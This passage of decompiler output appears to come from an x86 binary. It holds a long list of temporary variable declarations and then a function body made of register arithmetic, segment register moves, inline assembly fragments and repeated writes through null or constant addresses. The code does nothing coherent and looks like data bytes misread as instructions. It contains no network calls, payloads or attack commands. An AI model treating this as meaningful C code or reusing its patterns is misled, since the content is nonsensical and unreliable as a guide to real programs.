				void* _t493;
				void* _t495;
				signed int _t496;
				intOrPtr* _t507;
				intOrPtr* _t508;
				intOrPtr* _t509;
				signed int _t515;
				signed int _t516;
				intOrPtr* _t517;
				signed char _t519;
				signed int _t520;
				signed char _t521;
				void* _t524;
				signed int _t525;
				intOrPtr* _t526;
				signed int _t527;
				void* _t530;
				intOrPtr* _t531;
				void* _t532;
				void* _t533;
				void* _t534;
				void* _t535;
				intOrPtr* _t536;
				void* _t537;
				void* _t538;
				void* _t539;
				void* _t541;
				void* _t543;
				void* _t544;
				void* _t546;
				void* _t547;
				void* _t548;
				void* _t549;
				void* _t551;
				intOrPtr* _t552;
				signed char _t553;
				void* _t554;
				void* _t555;
				void* _t556;
				void* _t557;
				void* _t560;
				void* _t561;
				intOrPtr* _t563;
				intOrPtr* _t564;
				void* _t565;
				signed char _t566;
				signed char _t567;
				intOrPtr* _t568;
				signed int _t569;
				void* _t570;
				signed int _t571;
				void* _t572;

				_t564 = __esi;
				_t563 = __edi;
				_t530 = __edx + __ecx;
				_pop(es);
				_t388 = (__eax | 0x000000a6) ^ 0x00000000;
				if (_t388 >= 0) goto L1;
				 *0 =  *0 + _t388;
				 *_t388 =  *_t388 + _t388;
				asm("in al, dx");
				_pop(es);
				_t390 = (_t388 | 0x000000a6) ^ 0x00000000;
				if (_t390 < 0) goto L2;
				 *0 =  *0 + _t390;
				 *_t390 =  *_t390 + _t390;
				_t392 = (_t390 | 0x00b507a6) ^ 0x00000000;
				if (_t392 >= 0) goto L3;
				 *0 =  *0 + _t392;
				 *_t392 =  *_t392 + _t392;
				 *0xb507a6 =  *0xb507a6 ^ 0x00000000;
				_t393 = _t392 ^ 0x00007400;
				 *_t393 =  *_t393 + _t393;
				 *((intOrPtr*)(_t530 + 0xd)) =  *((intOrPtr*)(_t530 + 0xd)) + _t530;
				asm("cmpsb");
				es = cs;
				_t394 = _t393 ^ 0x00007500;
				 *_t394 =  *_t394 + _t394;
				 *((intOrPtr*)(_t568 + 0xffffffffffffffa6)) =  *((intOrPtr*)(_t568 + 0xffffffffffffffa6)) + _t530;
				_pop(es);
				_t395 = _t394 ^ 0x00007600;
				 *_t395 =  *_t395 + _t395;
				 *((intOrPtr*)(__esi - 0x4af859f3)) =  *((intOrPtr*)(__esi - 0x4af859f3)) + _t530;
				 *0x7700 =  *0x7700 + _t530;
				 *_t395 =  *_t395 + _t395;
				 *((intOrPtr*)(_t395 - 0x4af859f3)) =  *((intOrPtr*)(_t395 - 0x4af859f3)) + __ebx;
				 *__esi =  *__esi + _t530;
				 *_t395 =  *_t395 + __ebx;
				 *0 =  *0 + _t395;
				 *_t395 =  *_t395 + _t395;
				asm("fimul dword [0xb507a6]");
				 *[ss:ecx] =  *[ss:ecx] + __ebx;
				 *0 =  *0 + _t395;
				 *_t395 =  *_t395 + _t395;
				asm("cld");
				_t396 = _t395 | 0x00b507a6;
				 *[ss:edx] =  *[ss:edx] + __ebx;
				 *_t396 =  *_t396 ^ _t396;
				asm("das");
				_push(cs);
				asm("adc eax, [eax]");
				 *_t396 =  *_t396 ^ _t396;
				_push(0);
				ss = cs;
				 *0 =  *0 + _t530;
				 *((intOrPtr*)(__ebx + 0xe)) =  *((intOrPtr*)(__ebx + 0xe)) + _t530;
				asm("sbb eax, [eax]");
				 *_t396 =  *_t396 ^ _t396;
				_t569 = _t396;
				ds = cs;
				 *0 =  *0 + _t530;
				 *((intOrPtr*)(__edi + 0x3100230e)) =  *((intOrPtr*)(__edi + 0x3100230e)) + _t530;
				_t507 = 0 + __ebx;
				_push(cs);
				asm("daa");
				 *_t507 =  *_t507 + _t530;
				_t471 = __ebx + __ebx;
				_push(cs);
				_t398 = _t568 -  *_t568;
				 *_t398 =  *_t398 ^ _t398;
				asm("sbb eax, 0x31002f0f");
				 *__edi =  *__edi + _t471;
				asm("rdpmc");
				 *_t507 =  *_t507 + _t530;
				 *((intOrPtr*)(_t507 + 0xf)) =  *((intOrPtr*)(_t507 + 0xf)) + _t398;
				asm("aaa");
				 *_t507 =  *_t507 + _t530;
				 *((intOrPtr*)(_t507 + 0x33007010)) =  *((intOrPtr*)(_t507 + 0x33007010)) + _t530;
				 *_t507 =  *_t507 + _t530;
				asm("adc eax, [edx+0x1]");
				_t399 = _t398 &  *_t398;
				asm("adc eax, [esi+0x1]");
				 *[es:ecx+0x26014e13] =  *[es:ecx+0x26014e13] + _t471;
				_t472 = _t471 + _t471;
				asm("adc ecx, [esi+0x1]");
				_t508 = _t507 + _t472;
				asm("adc edx, [ecx+0x1]");
				 *_t399 =  *_t399 & _t399;
				ds = _t471;
				asm("adc al, 0x51");
				 *__esi =  *__esi + _t399;
				 *((intOrPtr*)(_t508 + 0x14)) =  *((intOrPtr*)(_t508 + 0x14)) + _t399;
				_push(_t508);
				 *_t508 =  *_t508 + _t570;
				 *((intOrPtr*)(_t472 + 0x14)) =  *((intOrPtr*)(_t472 + 0x14)) + _t399;
				_push(_t570);
				 *_t508 =  *_t508 + _t570;
				 *((intOrPtr*)(_t569 + 0x21015414)) =  *((intOrPtr*)(_t569 + 0x21015414)) + _t399;
				 *((intOrPtr*)(__edi + 0x21015414)) =  *((intOrPtr*)(__edi + 0x21015414)) + _t399;
				asm("adc cl, cl");
				asm("adc al, 0x42");
				 *_t508 =  *_t508 + _t570;
				_t473 = _t472;
				asm("adc al, 0x4e");
				 *_t508 =  *_t508 + _t570;
				 *0x21014e15 =  *0x21014e15 + _t508;
				 *__edi =  *__edi;
				asm("adc eax, 0x21014e");
				_push(_t508);
				asm("adc eax, 0x11014e");
				if( *__edi < 0) {
					_push(__edi);
					 *_t508 =  *_t508 + _t530;
					 *((intOrPtr*)(_t569 + 0x11015c15)) =  *((intOrPtr*)(_t569 + 0x11015c15)) + _t530;
					_t30 = _t569 + 0x16;
					 *_t30 =  *(_t569 + 0x16) + _t473;
					if( *_t30 == 0) {
						 *_t399 =  *_t399 ^ _t399;
					}
					 *((intOrPtr*)(_t563 + 0x31018316)) =  *((intOrPtr*)(_t563 + 0x31018316)) + _t473;
				}
				_t509 = _t508 + _t399;
				_push(ss);
				_t565 = _t564 + 1;
				 *_t509 =  *_t509 + _t565;
				_t474 = _t473 + _t399;
				_t566 = _t565 + 1;
				 *_t509 =  *_t509 + _t566;
				 *0x31018617 =  *0x31018617 + _t399;
				 *_t563 =  *_t563 + _t399;
				ss = ss;
				_t400 =  *_t509;
				 *_t509 = _t399;
				 *_t400 =  *_t400 ^ _t400;
				_push(_t474);
				asm("adc ecx, [ebx+0x31003301]");
				asm("adc eax, [edx+0x1]");
				_t401 = _t400 ^  *_t400;
				asm("adc eax, 0x3101ae18");
				 *_t563 =  *_t563 + _t530;
				asm("sbb [esi+0x53002301], dh");
				asm("adc eax, [esi+0x1]");
				asm("adc [eax], eax");
				asm("wait");
				asm("sbb dh, bl");
				 *_t509 =  *_t509 + _t530;
				 *((intOrPtr*)(_t569 + 0x101f31a)) =  *((intOrPtr*)(_t569 + 0x101f31a)) + _t474;
				_t475 = _t474 + _t474;
				asm("sbb al, [esi+0x1]");
				 *_t401 =  *_t401 + _t401;
				 *_t475 =  *_t475 + _t475;
				_t531 = _t530 + 1;
				 *_t509 =  *_t509 + _t401;
				 *((intOrPtr*)(_t563 + 0x19)) =  *((intOrPtr*)(_t563 + 0x19)) + _t401;
				asm("stc");
				 *_t509 =  *_t509 + _t401;
				 *_t475 =  *_t475 + _t401;
				asm("sbb edi, esi");
				 *_t509 =  *_t509 + _t401;
				 *((intOrPtr*)(_t569 + 0x1b)) =  *((intOrPtr*)(_t569 + 0x1b)) + _t401;
				_t402 = _t401 +  *_t531;
				 *_t402 =  *_t402 + _t402;
				asm("sbb eax, [bp+di]");
				_t532 = _t531 +  *_t475;
				asm("sbb al, 0x42");
				 *_t475 =  *_t475 + _t532;
				asm("sbb al, 0x63");
				_t533 = _t532 +  *_t475;
				asm("sbb al, 0x86");
				 *_t475 =  *_t475 + _t533;
				asm("sbb al, 0x3");
				_t534 = _t533 +  *_t475;
				asm("sbb al, 0x57");
				 *_t475 =  *_t475 + _t534;
				_t515 = _t509 + _t475 + _t475 + _t475 + _t475 + _t475 + _t475;
				asm("sbb al, 0x83");
				 *((intOrPtr*)(_t402 + 0x20)) =  *((intOrPtr*)(_t402 + 0x20)) + _t534;
				 *_t402 =  *_t402 + _t402;
				 *_t402 =  *_t402 + _t402;
				asm("adc [eax], bl");
				_push(ds);
				_t403 = _t402 |  *_t402;
				 *_t403 =  *_t403 + _t403;
				_t571 = cs;
				 *_t403 =  *_t403 & _t403;
				 *_t403 =  *_t403 + _t403;
				 *((intOrPtr*)(_t566 + 0xe0e2518)) =  *((intOrPtr*)(_t566 + 0xe0e2518)) + _t403;
				 *_t515 =  *_t515 + _t403;
				 *((intOrPtr*)(_t403 + 0x20)) =  *((intOrPtr*)(_t403 + 0x20)) + _t534;
				 *_t403 =  *_t403 + _t403;
				 *_t403 =  *_t403 | _t403;
				_t516 = _t403;
				asm("sbb [esi], bl");
				_t406 = (_t515 |  *_t515) +  *(_t515 |  *_t515);
				 *_t406 =  *_t406 + _t406;
				 *_t406 =  *_t406 + _t406;
				 *_t406 =  *_t406 + 0x91;
				 *(_t475 + 0x2003b0f) =  *(_t475 + 0x2003b0f) & _t406;
				 *_t406 =  *_t406 + _t406;
				 *_t406 =  *_t406 + _t406;
				 *((intOrPtr*)(_t406 - 0x38df6f00)) =  *((intOrPtr*)(_t406 - 0x38df6f00)) + _t406;
				_t407 =  >=  ?  *_t406 : _t406;
				_t408 = ( >=  ?  *_t406 : _t406) +  *_t407;
				_t52 = ( >=  ?  *_t406 : _t406) +  *_t407;
				_t572 = ( >=  ?  *_t406 : _t406) +  *_t407;
				_t410 = _t571 &  *_t571;
				 *_t410 =  *_t410 + _t516;
				 *((intOrPtr*)(_t516 + 0x4a0fe900)) =  *((intOrPtr*)(_t516 + 0x4a0fe900)) + _t534;
				 *0x22d400 =  *0x22d400 + _t410;
				 *_t410 =  *_t410 + _t516;
				 *((intOrPtr*)(_t566 + 0xa100b00)) =  *((intOrPtr*)(_t566 + 0xa100b00)) + _t534;
				 *_t563 =  *_t563 + _t410;
				_t412 = _t410 + _t534 -  *((intOrPtr*)(_t410 + _t534));
				 *_t412 =  *_t412 + _t516;
				 *((intOrPtr*)(_t475 + 0x52101000)) =  *((intOrPtr*)(_t475 + 0x52101000)) + _t534;
				 *_t563 =  *_t563 + _t412;
				 *_t412 =  *_t412 + _t516;
				_t413 = _t412 -  *_t412;
				 *_t413 =  *_t413 + _t516;
				 *((intOrPtr*)(_t475 + 0x52103200)) =  *((intOrPtr*)(_t475 + 0x52103200)) + _t534;
				 *_t563 =  *_t563 + _t413;
				 *_t413 =  *_t413 + _t413;
				 *_t413 =  *_t413 + _t413;
				 *_t475 =  *_t475 + _t413;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t413;
				 *_t563 =  *_t563 + _t413;
				 *_t413 =  *_t413 + _t413;
				 *_t413 =  *_t413 + _t413;
				 *_t475 =  *_t475 + _t413;
				_t535 = _t534 + _t413;
				 *((intOrPtr*)(_t566 + 0x10)) =  *((intOrPtr*)(_t566 + 0x10)) + _t535;
				0x800002f = cs;
				 *_t516 =  *_t516 + _t516;
				 *_t413 =  *_t413 + _t413;
				 *_t413 =  *_t413 + _t413;
				 *_t475 =  *_t475 + _t413;
				_t536 = _t535 + _t413;
				 *((intOrPtr*)(_t413 + _t536 + 0x61)) =  *((intOrPtr*)(_t413 + _t536 + 0x61)) + 0x800002f;
				 *_t536 =  *_t536 + _t516;
				 *_t413 =  *_t413 + _t413;
				 *_t413 =  *_t413 + _t413;
				 *_t475 =  *_t475 + _t413;
				_t537 = _t536 + _t413;
				 *((intOrPtr*)(_t413 + 0xd006a10)) =  *((intOrPtr*)(_t413 + 0xd006a10)) + _t413;
				 *((intOrPtr*)(_t475 + _t569)) =  *((intOrPtr*)(_t475 + _t569)) + _t475;
				 *_t413 =  *_t413 + _t413;
				 *_t413 =  *_t413 + _t413;
				_t517 = _t413;
				asm("sbb [esi], bl");
				_push(cs);
				_t415 = _t516 |  *_t516;
				_push(cs);
				 *((intOrPtr*)(_t415 + 0x2b)) =  *((intOrPtr*)(_t415 + 0x2b)) + _t475;
				 *_t415 =  *_t415 + _t415;
				 *_t415 =  *_t415 + _t415;
				_t476 =  *_t415;
				 *_t415 = _t475;
				 *((intOrPtr*)(_t476 + _t569)) =  *((intOrPtr*)(_t476 + _t569)) + _t517;
				_t477 = _t415 & 0x0e00750e;
				 *((intOrPtr*)(_t477 + 0xe000a10)) =  *((intOrPtr*)(_t477 + 0xe000a10)) + _t537;
				 *((intOrPtr*)(_t477 + _t569)) =  *((intOrPtr*)(_t477 + _t569)) + _t477;
				_t418 = _t517;
				_t519 = _t476 + _t537;
				asm("adc [ecx], bh");
				_push(cs);
				 *_t418 =  *_t418 + _t418;
				_t419 = _t418;
				 *_t419 =  *_t419 + _t419;
				 *((intOrPtr*)(_t519 - 0x7ceec500)) =  *((intOrPtr*)(_t519 - 0x7ceec500)) + _t537;
				 *_t419 =  *_t419 + _t537;
				 *((intOrPtr*)(0x800002f + _t569)) =  *((intOrPtr*)(0x800002f + _t569)) + _t477;
				 *_t419 =  *_t419 + _t419;
				 *((intOrPtr*)(_t519 + 0x79117f00)) =  *((intOrPtr*)(_t519 + 0x79117f00)) + _t537;
				 *_t519 =  *_t519 + _t537;
				 *_t419 =  *_t419 + _t419;
				 *_t419 =  *_t419 + _t419;
				 *_t477 =  *_t477 + _t419;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t419;
				 *_t477 =  *_t477 + _t537;
				 *_t419 =  *_t419 + _t419;
				 *_t419 =  *_t419 + _t419;
				 *_t477 =  *_t477 + _t419;
				_t538 = _t537 + _t419;
				 *((intOrPtr*)(_t566 + 0x10)) =  *((intOrPtr*)(_t566 + 0x10)) + _t538;
				_t420 =  *_t419;
				asm("adc eax, 0x0");
				 *_t477 =  *_t477 + _t420;
				_t539 = _t538 + _t420;
				 *((intOrPtr*)(_t420 + _t539 - 0x6f)) =  *((intOrPtr*)(_t420 + _t539 - 0x6f)) + 0x800002f;
				 *_t563 =  *_t563 + _t539;
				 *_t420 =  *_t420 + _t420;
				 *_t420 =  *_t420 + _t420;
				 *_t477 =  *_t477 + _t420;
				 *((intOrPtr*)(_t420 + 0x1b009c10)) =  *((intOrPtr*)(_t420 + 0x1b009c10)) + _t420;
				 *_t420 =  *_t420 + _t420;
				 *_t420 =  *_t420 + _t420;
				 *_t477 =  *_t477 + _t420;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t420;
				 *((intOrPtr*)(_t420 + _t420)) =  *((intOrPtr*)(_t420 + _t420)) + _t477;
				 *_t420 =  *_t420 + _t420;
				 *_t420 =  *_t420 + _t420;
				_t421 = _t420 +  *_t420;
				 *_t519 = 0x56;
				asm("adc [edx+0x1e00], cl");
				 *_t421 =  *_t421 + _t421;
				 *_t477 =  *_t477 + _t421;
				_t541 = _t539 + _t420 + _t421;
				 *((intOrPtr*)(_t421 + _t541 - 0x6f)) =  *((intOrPtr*)(_t421 + _t541 - 0x6f)) + 0x800002f;
				 *_t421 =  *_t421 + _t421;
				 *_t421 =  *_t421 + _t421;
				 *_t421 =  *_t421 + _t421;
				 *_t477 =  *_t477 + _t421;
				 *((intOrPtr*)(_t421 + 0x24009c10)) =  *((intOrPtr*)(_t421 + 0x24009c10)) + _t421;
				 *_t421 =  *_t421 + _t421;
				 *_t421 =  *_t421 + _t421;
				 *_t477 =  *_t477 + _t421;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t421;
				 *0 =  *0 + _t421;
				 *_t477 =  *_t477 + _t421;
				_t543 = _t541 + _t421 + _t421;
				 *((intOrPtr*)(_t566 + 0x10)) =  *((intOrPtr*)(_t566 + 0x10)) + _t543;
				_t422 =  *_t421;
				asm("daa");
				 *_t422 =  *_t422 + _t422;
				 *_t422 =  *_t422 + _t422;
				 *_t477 =  *_t477 + _t422;
				_t544 = _t543 + _t422;
				 *((intOrPtr*)(_t422 + _t544 - 0x6f)) =  *((intOrPtr*)(_t422 + _t544 - 0x6f)) + 0x800002f;
				 *_t519 =  *_t519 + _t519;
				 *_t422 =  *_t422 + _t422;
				 *_t422 =  *_t422 + _t422;
				 *_t477 =  *_t477 + _t422;
				 *((intOrPtr*)(_t422 + 0x2d009c10)) =  *((intOrPtr*)(_t422 + 0x2d009c10)) + _t422;
				 *_t422 =  *_t422 + _t422;
				 *_t422 =  *_t422 + _t422;
				 *_t477 =  *_t477 + _t422;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t422;
				 *_t566 =  *_t566 + _t519;
				 *_t422 =  *_t422 + _t422;
				 *_t422 =  *_t422 + _t422;
				 *_t477 =  *_t477 + _t422;
				_t546 = _t544 + _t422 + _t422;
				 *((intOrPtr*)(_t566 + 0x10)) =  *((intOrPtr*)(_t566 + 0x10)) + _t546;
				_t423 =  *_t422;
				 *_t423 =  *_t423 ^ _t423;
				 *_t423 =  *_t423 + _t423;
				 *_t423 =  *_t423 + _t423;
				_t424 = _t423 +  *_t423;
				 *_t519 = 0x64;
				asm("adc [ecx+0x3200], dl");
				 *_t424 =  *_t424 + _t424;
				 *_t477 =  *_t477 + _t424;
				_t547 = _t546 + _t424;
				 *((intOrPtr*)(_t424 + 0x36009c10)) =  *((intOrPtr*)(_t424 + 0x36009c10)) + _t424;
				 *_t424 =  *_t424 + _t424;
				 *_t424 =  *_t424 + _t424;
				 *_t477 =  *_t477 + _t424;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t424;
				 *_t563 =  *_t563 + _t547;
				 *_t424 =  *_t424 + _t424;
				 *_t424 =  *_t424 + _t424;
				 *_t477 =  *_t477 + _t424;
				_t548 = _t547 + _t424;
				 *((intOrPtr*)(_t566 + 0x10)) =  *((intOrPtr*)(_t566 + 0x10)) + _t548;
				 *0x3900 = _t424;
				 *_t424 =  *_t424 + _t424;
				 *_t477 =  *_t477 + _t424;
				_t549 = _t548 + _t424;
				 *((intOrPtr*)(_t424 + _t549 - 0x55)) =  *((intOrPtr*)(_t424 + _t549 - 0x55)) + 0x800002f;
				 *_t566 =  *_t566 + _t477;
				 *_t424 =  *_t424 + _t424;
				 *_t424 =  *_t424 + _t424;
				 *_t477 =  *_t477 + _t424;
				 *((intOrPtr*)(_t424 + 0x45006a10)) =  *((intOrPtr*)(_t424 + 0x45006a10)) + _t424;
				 *_t424 =  *_t424 + _t424;
				 *_t424 =  *_t424 + _t424;
				 *_t477 =  *_t477 + _t424;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t424;
				 *_t566 =  *_t566 + _t424;
				 *_t424 =  *_t424 + _t424;
				 *_t424 =  *_t424 + _t424;
				_t425 = _t424 +  *_t424;
				 *_t519 = 0x56;
				asm("adc [eax+0x4800], bh");
				 *_t425 =  *_t425 + _t425;
				 *_t477 =  *_t477 + _t425;
				_t551 = _t549 + _t424 + _t425;
				 *((intOrPtr*)(_t425 + _t551 - 0x3d)) =  *((intOrPtr*)(_t425 + _t551 - 0x3d)) + 0x800002f;
				 *_t569 =  *_t569 + _t519;
				 *_t425 =  *_t425 + _t425;
				 *_t425 =  *_t425 + _t425;
				_t426 = _t425 +  *_t425;
				 *_t519 = 0x80;
				asm("adc dl, dl");
				 *((intOrPtr*)(_t426 + _t426)) =  *((intOrPtr*)(_t426 + _t426)) + _t551;
				 *_t426 =  *_t426 + _t426;
				 *_t477 =  *_t477 + _t426;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t426;
				 *_t566 =  *_t566 + _t551;
				 *_t426 =  *_t426 + _t426;
				 *_t426 =  *_t426 + _t426;
				_t427 = _t426 +  *_t426;
				 *_t519 = 0x56;
				asm("adc dl, bl");
				 *_t427 =  *_t427 + _t477;
				 *_t427 =  *_t427 + _t427;
				 *_t427 =  *_t427 + _t427;
				_t428 = _t427 +  *_t427;
				 *_t519 = 0x64;
				asm("adc ch, ah");
				 *_t569 =  *_t569 + _t477;
				 *_t428 =  *_t428 + _t428;
				 *_t428 =  *_t428 + _t428;
				_t429 = _t428 +  *_t428;
				 *_t519 = 0x80;
				asm("adc ah, dh");
				 *((intOrPtr*)(_t429 + _t429)) =  *((intOrPtr*)(_t429 + _t429)) + _t429;
				 *_t429 =  *_t429 + _t429;
				 *_t477 =  *_t477 + _t429;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t429;
				 *_t563 =  *_t563 + _t429;
				 *_t429 =  *_t429 + _t429;
				 *_t429 =  *_t429 + _t429;
				_t430 = _t429 +  *_t429;
				 *_t519 = 0x56;
				asm("adc dh, bh");
				 *_t519 =  *_t519 + _t519;
				 *_t430 =  *_t430 + _t430;
				 *_t430 =  *_t430 + _t430;
				 *_t519 = 0x64;
				asm("adc [ecx+eax], al");
				_t432 =  *(_t430 +  *_t430) * 0;
				 *_t432 =  *_t432 + _t432;
				 *_t477 =  *_t477 + _t432;
				_t552 = _t551 + _t432;
				 *((intOrPtr*)(_t432 + 0x6f006a10)) =  *((intOrPtr*)(_t432 + 0x6f006a10)) + _t432;
				 *_t432 =  *_t432 + _t432;
				 *_t432 =  *_t432 + _t432;
				 *_t477 =  *_t477 + _t432;
				 *((intOrPtr*)(_t566 + 0x560e2518)) =  *((intOrPtr*)(_t566 + 0x560e2518)) + _t432;
				 *_t432 =  *_t432 + _t552;
				 *_t432 =  *_t432 + _t432;
				 *_t432 =  *_t432 + _t432;
				_t433 = _t432 +  *_t432;
				 *_t519 = 0x56;
				asm("adc [esi], cl");
				 *_t552 =  *_t552 + _t566;
				 *_t433 =  *_t433 + _t433;
				 *_t433 =  *_t433 + _t433;
				_t434 = _t433 +  *_t433;
				 *_t519 = 0x64;
				asm("adc [eax], ah");
				 *(_t434 + _t434) =  *(_t434 + _t434) + _t563;
				 *_t434 =  *_t434 + _t434;
				 *_t477 =  *_t477 + _t434;
				_t553 = _t552 + _t434;
				 *((intOrPtr*)(_t434 - 0x77fec9f0)) =  *((intOrPtr*)(_t434 - 0x77fec9f0)) + _t434;
				_t436 = _t434 + _t434;
				 *_t436 =  *_t436 + _t436;
				 *((intOrPtr*)(_t519 + 0xa0e1e18)) =  *((intOrPtr*)(_t519 + 0xa0e1e18)) + _t553;
				 *((intOrPtr*)(_t477 + 0x2d4c00)) =  *((intOrPtr*)(_t477 + 0x2d4c00)) + _t519;
				 *_t436 =  *_t436 + _t436;
				 *((intOrPtr*)(_t566 + 0x750e2518)) =  *((intOrPtr*)(_t566 + 0x750e2518)) + _t436;
				 *((intOrPtr*)(_t477 + 0x2d6000)) =  *((intOrPtr*)(_t477 + 0x2d6000)) + _t519;
				 *_t436 =  *_t436 + _t436;
				 *((intOrPtr*)(_t477 + 0x49137500)) =  *((intOrPtr*)(_t477 + 0x49137500)) + _t553;
				 *((intOrPtr*)(_t477 + 0x2e5400)) =  *((intOrPtr*)(_t477 + 0x2e5400)) + _t519;
				 *_t436 =  *_t436 + _t519;
				 *((intOrPtr*)(_t477 + 0x750e2518)) =  *((intOrPtr*)(_t477 + 0x750e2518)) + _t436;
				 *((intOrPtr*)(_t436 + _t436 + 0x2e74)) =  *((intOrPtr*)(_t436 + _t436 + 0x2e74)) + _t519;
				 *_t436 =  *_t436 | _t436;
				_t437 = _t477;
				 *(_t563 - 0x73fe9feb) =  *(_t563 - 0x73fe9feb) | _t553;
				 *((intOrPtr*)(_t437 + 0x2f)) =  *((intOrPtr*)(_t437 + 0x2f)) + _t437;
				 *_t437 =  *_t437 + _t437;
				 *_t437 =  *_t437 | _t437;
				_t438 = _t436;
				_t479 = _t437;
				_t520 = _t519 | _t438;
				asm("adc eax, 0x8c0166");
				if(_t520 >= 0) {
					 *_t438 =  *_t438 + _t438;
					 *_t438 =  *_t438 | _t438;
					asm("adc eax, 0x8c016b");
					asm("das");
					 *0x800002f =  *0x800002f + 0x800002f;
					 *0x800002f =  *0x800002f | 0x0800002f;
					_t469 = _t438 | _t520;
					_t520 = _t520 + _t553;
					asm("adc eax, 0x8d0052");
					 *_t469 =  *_t469 + _t469;
					 *_t469 =  *_t469 | _t469;
					_t438 = 0x800002f;
					_t479 = _t469 + _t553;
					asm("adc eax, 0x8d0052");
					 *((intOrPtr*)(_t479 + 0x71161900)) =  *((intOrPtr*)(_t479 + 0x71161900)) + _t553;
				}
				 *_t520 =  *_t520 + _t479;
				_push(ss);
				if( *_t520 < 0) {
				}
				_t439 = _t438 + _t479;
				asm("das");
				 *_t439 =  *_t439 + _t439;
				 *_t439 =  *_t439 | _t439;
				_t480 =  *_t439;
				 *_t439 = _t479;
				_t441 = (_t439 & 0x8e00750e) + _t553;
				asm("das");
				 *_t441 =  *_t441 + _t441;
				 *_t441 =  *_t441 | _t441;
				_t521 = _t441;
				asm("sbb [esi], bl");
				_push(cs);
				_t443 = _t520 |  *_t520;
				es =  *_t443;
				_t444 = _t443 & 0x00000030;
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 | _t444;
				_t445 = _t566;
				_t567 = _t444;
				_t194 = _t569 + 0x16;
				 *_t194 =  *(_t569 + 0x16) | _t521;
				if( *_t194 > 0) {
					es =  *_t445;
				}
				 *((intOrPtr*)(_t445 + 0x30)) =  *((intOrPtr*)(_t445 + 0x30)) + _t445;
				 *_t445 =  *_t445 + _t445;
				 *_t445 =  *_t445 | _t445;
				_t446 = _t480;
				_t481 = _t445;
				 *((intOrPtr*)(_t521 + 0x16)) =  *((intOrPtr*)(_t521 + 0x16)) + _t481;
				_push(_t553);
				 *((intOrPtr*)(_t567 + 0x305400)) =  *((intOrPtr*)(_t567 + 0x305400)) + _t521;
				 *_t446 =  *_t446 + _t521;
				 *((intOrPtr*)(_t481 + 0x52168c00)) =  *((intOrPtr*)(_t481 + 0x52168c00)) + _t553;
				 *((intOrPtr*)(_t567 + 0x306800)) =  *((intOrPtr*)(_t567 + 0x306800)) + _t521;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t521 + 0xa0e1e18)) =  *((intOrPtr*)(_t521 + 0xa0e1e18)) + _t553;
				 *((intOrPtr*)(_t567 + 0x30c000)) =  *((intOrPtr*)(_t567 + 0x30c000)) + _t521;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t567 + 0x750e2518)) =  *((intOrPtr*)(_t567 + 0x750e2518)) + _t446;
				 *((intOrPtr*)(_t567 + 0x30d400)) =  *((intOrPtr*)(_t567 + 0x30d400)) + _t521;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t521 - 0x7ceec500)) =  *((intOrPtr*)(_t521 - 0x7ceec500)) + _t553;
				 *((intOrPtr*)(_t567 + 0x311800)) =  *((intOrPtr*)(_t567 + 0x311800)) + _t521;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t521 - 0x71e8b700)) =  *((intOrPtr*)(_t521 - 0x71e8b700)) + _t553;
				 *((intOrPtr*)(_t563 + 0x320000)) =  *((intOrPtr*)(_t563 + 0x320000)) + _t521;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t481 - 0x69e89500)) =  *((intOrPtr*)(_t481 - 0x69e89500)) + _t553;
				 *((intOrPtr*)(_t446 + 0x324000)) =  *((intOrPtr*)(_t446 + 0x324000)) + _t553;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t481 - 0x61e85100)) =  *((intOrPtr*)(_t481 - 0x61e85100)) + _t553;
				 *((intOrPtr*)(_t521 + 0x327800)) =  *((intOrPtr*)(_t521 + 0x327800)) + _t553;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t481 - 0x58e82f00)) =  *((intOrPtr*)(_t481 - 0x58e82f00)) + _t553;
				 *((intOrPtr*)(_t481 + 0x35f800)) =  *((intOrPtr*)(_t481 + 0x35f800)) + _t553;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t521 + 0xa0e1e18)) =  *((intOrPtr*)(_t521 + 0xa0e1e18)) + _t553;
				 *((intOrPtr*)(_t569 + 0x372800)) =  *((intOrPtr*)(_t569 + 0x372800)) + _t553;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t567 + 0x750e2518)) =  *((intOrPtr*)(_t567 + 0x750e2518)) + _t446;
				 *((intOrPtr*)(_t569 + 0x373c00)) =  *((intOrPtr*)(_t569 + 0x373c00)) + _t553;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t481 - 0x44e7a700)) =  *((intOrPtr*)(_t481 - 0x44e7a700)) + _t553;
				 *((intOrPtr*)(_t569 + 0x38cc00)) =  *((intOrPtr*)(_t569 + 0x38cc00)) + _t553;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t521 - 0x3de71f00)) =  *((intOrPtr*)(_t521 - 0x3de71f00)) + _t553;
				 *((intOrPtr*)(_t446 + 0x393800)) =  *((intOrPtr*)(_t446 + 0x393800)) + _t481;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t521 - 0x31e69700)) =  *((intOrPtr*)(_t521 - 0x31e69700)) + _t553;
				 *((intOrPtr*)(_t481 + 0x39d000)) =  *((intOrPtr*)(_t481 + 0x39d000)) + _t481;
